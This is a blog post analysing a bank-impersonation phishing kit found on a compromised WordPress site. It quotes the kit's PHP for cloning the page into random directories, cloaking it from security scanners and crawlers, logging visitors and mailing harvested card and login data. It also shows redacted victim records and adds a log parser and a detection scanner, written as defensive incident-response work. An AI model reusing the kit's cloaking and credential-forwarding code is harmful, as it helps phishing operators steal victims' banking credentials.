Phishing content in my WordPress website

[Featured image: Hack Fraud Card Code Computer, by mohamed_hassan / Pixabay]

This is another site from which I removed malware. After receiving the site's login details, I inspected the files of the WordPress installation and soon found the malicious content. The hacker was using the site to lure victims with a phishing page.

One of the reasons hackers compromise a website is to trick users into entering sensitive information through it. They upload files which, when browsed, look like a legitimate website such as PayPal. The victim then tries to log in with their valid credentials. The entered login details are stored in a text file and/or sent to the hacker's email. When the victim clicks the login button, the login fails and the victim is redirected to the legitimate site's login page. You can read more about phishing sites here: https://en.wikipedia.org/wiki/Phishing

Phishing is not limited to websites. Hackers also send phishing emails to you; you may find some in your spam folder. I highly recommend testing your skill at spotting phishing emails with the quiz on the Kaspersky website: https://www.kaspersky.com/blog/black-friday-scam-quiz/13485/

Back to my client's website: the victims' information was saved in a text file like the one below:

/---------------- VICTIM DETAILS ----------------/
IP address : 83.1xx.2xx.2xx
Country : Spain
OS : Android
Browser : Handheld Browser
--

/-- LOG INFOS --/90.1xx.1xx.20
Documento : NIF
Nº de documento : 0507
Usuario : 
Password : 48907xxxx

How do they do it?

First of all, they want to hide their content from search engine crawlers like Google. For this they create a file called robots.txt with the following content:

User-agent: *
Disallow: /

The following is the content of index.php:

<?php

include 'inc/app.php';
$get_user_ip          = get_user_ip();
$get_user_country     = get_user_country($get_user_ip);
$get_user_countrycode = get_user_countrycode($get_user_ip);
$get_user_os          = get_user_os();
$get_user_browser     = get_user_browser();

$random = rand(0,100000000000);
$DIR    = substr(md5($random), 0, 15);
$dispatch = substr(md5($random), 0, 17);
function recurse_copy($home,$DIR) {
    $dir = opendir($home);
    @mkdir($DIR);
    while(false !== ( $file = readdir($dir)) ) {
        if (( $file != '.' ) && ( $file != '..' )) {
            if ( is_dir($home . '/' . $file) ) {
                recurse_copy($home . '/' . $file,$DIR . '/' . $file);
            } else {
                copy($home . '/' . $file,$DIR . '/' . $file);
            }
        }
    }
    closedir($dir);
}

$home="z0n51";
recurse_copy( $home, $DIR );
header("location:$DIR/login.php?signin#_");
$file = fopen("vu.txt","a");
fwrite($file,$get_user_ip."  -  ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")." >> [$get_user_country | $get_user_os | $get_user_browser] \n");

?>

The folder z0n51 contains all the files required for the phishing page. All the content of this folder is copied into a randomly generated 15-character folder (the first 15 characters of an MD5 hash of a random number), and the visitor is redirected to the login page inside it. The file vu.txt records each visitor's IP address, the date and time, country name, operating system and browser. A sample is as follows:

4x.6x.6x.8x  -  2020-9-07 @ 21:44:12 >> [Spain | iPhone | Handheld Browser] 
1xx.x6.215.69  -  2020-9-07 @ 21:58:04 >> [Spain | Windows 10 | Chrome] 
9x.2xx.xx0.xx  -  2020-9-07 @ 22:06:33 >> [Spain | Android | Handheld Browser] 
x1.2xx.1xx.xx  -  2020-9-07 @ 22:08:03 >> [Spain | Android | Handheld Browser] 
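To turn a visitor log in this format into the figures an incident report needs (how many people were exposed, over what time window, from which platforms), here is a parser for the vu.txt line format shown above. It is an example added to this article, not part of the kit or of the original post; the addresses in its sample are constructed from documentation ranges because the real entries are redacted, and the regular expression follows the format string the kit's index.php uses (gmdate("Y-n-d"), so a month without a leading zero is accepted).

```python
import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List, Optional

# One line per visit, as written by the kit's index.php:
#   <ip>  -  <Y-n-d> @ <H:i:s> >> [<country> | <os> | <browser>]
# gmdate("Y-n-d") emits the month without a leading zero, so 1 or 2 digits are accepted.
VU_LINE = re.compile(
    r"^(?P<ip>\S+)\s+-\s+(?P<date>\d{4}-\d{1,2}-\d{1,2})\s+@\s+(?P<time>\d{2}:\d{2}:\d{2})"
    r"\s+>>\s+\[(?P<country>[^|\]]*)\|(?P<os>[^|\]]*)\|(?P<browser>[^\]]*)\]"
)


@dataclass(frozen=True)
class Visit:
    ip: str
    seen_at: datetime  # UTC, because the kit timestamps with gmdate()
    country: str
    os: str
    browser: str


def parse_vu_line(line: str) -> Optional[Visit]:
    """Parse one vu.txt line; return None for anything that is not a kit entry."""
    m = VU_LINE.match(line.strip())
    if m is None:
        return None
    seen = datetime.strptime(f"{m['date']} {m['time']}", "%Y-%m-%d %H:%M:%S")
    return Visit(m["ip"], seen.replace(tzinfo=timezone.utc),
                 m["country"].strip(), m["os"].strip(), m["browser"].strip())


def parse_vu_log(text: str) -> List[Visit]:
    """Parse a whole vu.txt, silently skipping blank or foreign lines."""
    visits = []
    for line in text.splitlines():
        v = parse_vu_line(line)
        if v is not None:
            visits.append(v)
    return visits


def summarize(visits: List[Visit]) -> Dict[str, object]:
    """Scope, time window and affected populations for an incident report."""
    if not visits:
        return {"visits": 0, "unique_ips": [], "by_country": {}, "by_os": {},
                "first_seen": None, "last_seen": None}
    times = [v.seen_at for v in visits]
    return {
        "visits": len(visits),
        "unique_ips": sorted({v.ip for v in visits}),
        "by_country": dict(Counter(v.country for v in visits)),
        "by_os": dict(Counter(v.os for v in visits)),
        "first_seen": min(times).isoformat(),
        "last_seen": max(times).isoformat(),
    }


# Constructed sample in the kit's format (documentation-range addresses, not real victims).
SAMPLE_VU_TXT = """\
203.0.113.10  -  2020-9-07 @ 21:44:12 >> [Spain | iPhone | Handheld Browser]
198.51.100.25  -  2020-9-07 @ 21:58:04 >> [Spain | Windows 10 | Chrome]
203.0.113.10  -  2020-9-07 @ 22:06:33 >> [Spain | Android | Handheld Browser]
garbage line that a disk-recovery tool might leave behind
"""

if __name__ == "__main__":
    report = summarize(parse_vu_log(SAMPLE_VU_TXT))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Point it at the real vu.txt (open the file and pass its contents to parse_vu_log) to get the unique address list and first/last-seen window; unmatched lines are dropped rather than raising, which matters when the file has been partly overwritten or recovered.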

The content of inc/app.php is as follows:

<?php
session_start();
error_reporting(0);
include_once 'functions.php';
include_once 'anti/anti1.php';
include_once 'anti/anti2.php';
include_once 'anti/anti3.php';
include_once 'anti/anti4.php';
include_once 'anti/anti5.php';
include_once 'anti/anti6.php';
include_once 'anti/anti7.php';
include_once 'anti/anti8.php';

Let's see what is inside anti/anti1.php:

<?php $c28dd9c=$_SERVER['REMOTE_ADDR'];$c97e57ec=array("^66.102.*.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^173.239.*.*","^173.244.36.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","68.65.53.71","^198.25.*.*","^64.106.213.*","173.239.240.147",
"103.248.172.42",
# skipped 
"103.248.172.42"
);if(in_array($c28dd9c,$c97e57ec)){exit(header('Location: https://www.bancosantander.es/es/aviso-legal'));}else{foreach($c97e57ec as $a4ade){if(preg_match('/'.$a4ade.'/',$c28dd9c)){header('Location: https://www.bancosantander.es/es/aviso-legal');echo("<h1>404 Not Found</h1>The page that you have requested could not be found.");}}}$e5bd3f5f=gethostbyaddr($c28dd9c);$f6650d6e=array("drweb","hostinger","scanurl","above","google","Dr.Web","facebook","softlayer","amazonaws","cyveillance","dreamhost","netpilot","calyxinstitute","tor-exit","phishtank","msnbot","p3pwgdsn","netcraft","trendmicro","ebay","paypal","torservers","messagelabs","sucuri.net","crawler");foreach($f6650d6e as $e540ca){if(substr_count($e5bd3f5f,$e540ca)>0){header('Location: https://www.bancosantander.es/es/aviso-legal');echo("<h1>404 Not Found</h1>The page that you have requested could not be found.");}}if(!empty($_SERVER['HTTP_USER_AGENT'])){$c3d1b=array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");foreach($c3d1b as $cef6a){if(strpos($_SERVER['HTTP_USER_AGENT'],$cef6a)!==false){exit(header('Location: https://www.bancosantander.es/es/aviso-legal'));}}}?>

As you may have guessed, the hackers do not want to be detected by malware-scanning services and the big internet companies, so they block their IP ranges (and, further down in the same file, their reverse-DNS hostnames and crawler user agents), redirecting them to the real bank's legal notice page instead.

There is one other thing we want to know: where do these victim details go? To find out, we have to check the submit.php file.

<?php

include_once '../inc/app.php';
include_once '../vendor/autoload.php';
use Inacho\CreditCard;

function validate_cc_number($number = null) {
    $card = CreditCard::validCreditCard($number);
    if( $card['valid'] == false ) {
        return false;
    }
    return $card;
}

function validate_cc_cvv($number = null,$type = null) {
    if( empty($number) || empty($type) )
        return false;
    $cvv = CreditCard::validCvc($number, $type);
    return $cvv;
}

$to = '[email protected]'; // <-- This is the hacker's email
# skipped
?>

So, the victims' credentials are forwarded to a zohomail address.
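Taken together, the three files leave a fairly stable set of indicators: a robots.txt that blocks every crawler, an anti/*.php filter that matches the visitor's address, reverse-DNS name and user agent against scanner lists, an index.php that clones the kit into a hash-named directory and redirects to it, and a submit.php that mails the POSTed form fields. The following scanner is an example added here, not code from the post or the kit; it walks a directory tree and scores PHP files and robots.txt against those indicators. The files it builds in a temporary directory are constructed fragments modelled on the snippets quoted above, with placeholder addresses and a placeholder mail recipient.

```python
import re
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Indicators drawn from the kit quoted above. An indicator fires only when EVERY
# pattern in its list occurs somewhere in the file (case-insensitive search).
PHP_INDICATORS: List[Tuple[str, int, List[str]]] = [
    ("visitor IP blocklist against scanner ranges", 3,
     [r"\$_SERVER\[\s*['\"]REMOTE_ADDR['\"]\s*\]", r"\bpreg_match\s*\(",
      r"['\"]\^\d{1,3}\.\d{1,3}\.\*"]),
    ("reverse-DNS filter for security vendors and crawlers", 3,
     [r"\bgethostbyaddr\s*\(",
      r"phishtank|netcraft|sucuri|drweb|cyveillance|trendmicro|crawler"]),
    ("search-engine user-agent redirect", 2,
     [r"HTTP_USER_AGENT", r"Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler",
      r"\bheader\s*\(\s*['\"]location:"]),
    ("kit cloned into a random hash-named directory", 3,
     [r"\bsubstr\s*\(\s*md5\s*\(", r"\bmkdir\s*\(", r"\bcopy\s*\(",
      r"\bheader\s*\(\s*['\"]location:"]),
    ("credentials from POST forwarded by mail()", 4,
     [r"\bmail\s*\(", r"\$_POST\[", r"pass(word|wd)?|cvv|card"]),
]
COMPILED = [(n, w, [re.compile(p, re.I) for p in pats]) for n, w, pats in PHP_INDICATORS]

def scan_php_source(src: str) -> List[Tuple[str, int]]:
    return [(n, w) for n, w, pats in COMPILED if all(p.search(src) for p in pats)]

def robots_blocks_everything(text: str) -> bool:
    """True when a 'User-agent: *' group contains 'Disallow: /' (crawl nothing)."""
    in_wildcard_group = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            in_wildcard_group = value == "*"
        elif key == "disallow" and in_wildcard_group and value == "/":
            return True
    return False

def scan_tree(root: Path) -> Dict[str, dict]:
    """Score every PHP file and robots.txt under root, keyed by posix relative path."""
    results: Dict[str, dict] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.name.lower() == "robots.txt":
            hits = ([("robots.txt hides the whole directory from crawlers", 1)]
                    if robots_blocks_everything(text) else [])
        elif path.suffix.lower() in (".php", ".phtml"):
            hits = scan_php_source(text)
        else:
            continue  # images, CSS, the kit's own text logs: not scored here
        results[path.relative_to(root).as_posix()] = {
            "score": sum(w for _, w in hits), "indicators": [n for n, _ in hits]}
    return results

# Constructed fixtures modelled on the fragments quoted in the post. Addresses and
# the mail recipient are placeholders; wp-login.php stands in for a clean file.
SAMPLE_FILES = {
    "robots.txt": "User-agent: *\nDisallow: /\n",
    "index.php": """<?php
$dir = substr(md5(rand(0, 100000)), 0, 15);
@mkdir($dir);
copy('kit/login.php', $dir . '/login.php');
header("location:$dir/login.php");
""",
    "anti/anti1.php": """<?php
$ip = $_SERVER['REMOTE_ADDR'];
foreach (array("^66.102.*.*", "^74.125.*.*") as $p) { if (preg_match('/' . $p . '/', $ip)) { header('Location: https://example.com/'); } }
if (substr_count(gethostbyaddr($ip), 'phishtank') > 0) { header('Location: https://example.com/'); }
""",
    "submit.php": """<?php
$to = 'attacker@example.invalid'; // placeholder recipient
mail($to, 'New login', 'user=' . $_POST['username'] . ' password=' . $_POST['password']);
""",
    "wp-login.php": """<?php
wp_signon(array('user_login' => $_POST['log'], 'user_password' => $_POST['pwd']), false);
""",
}

def build_sample_tree(root: Path) -> None:
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")

def demo() -> Dict[str, dict]:
    """Build the fixtures in a temporary directory, scan them, then clean up."""
    root = Path(tempfile.mkdtemp(prefix="kitscan-"))
    try:
        build_sample_tree(root)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Run scan_tree(Path("/path/to/public_html")) against a suspected install and review anything with a non-zero score by hand: the weights are heuristics, a robots.txt that disallows everything is also common on staging sites, and a genuine wp-login.php reads POSTed credentials without ever calling mail(), which is why the clean fixture scores zero.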

2 comments

  1. Hi,

    Did you find out how the malicious files were uploaded to the server?

    We suffered the same attack and managed to disinfect but we wouldn’t like to see it happen again.

    Thank you in advance for your answer,

    Yours sincerely,

1. Not really, the logs were limited because the client was hosting his website on a shared server. But after changing the cPanel password, those files never appeared. So it is likely that the cPanel password was compromised.
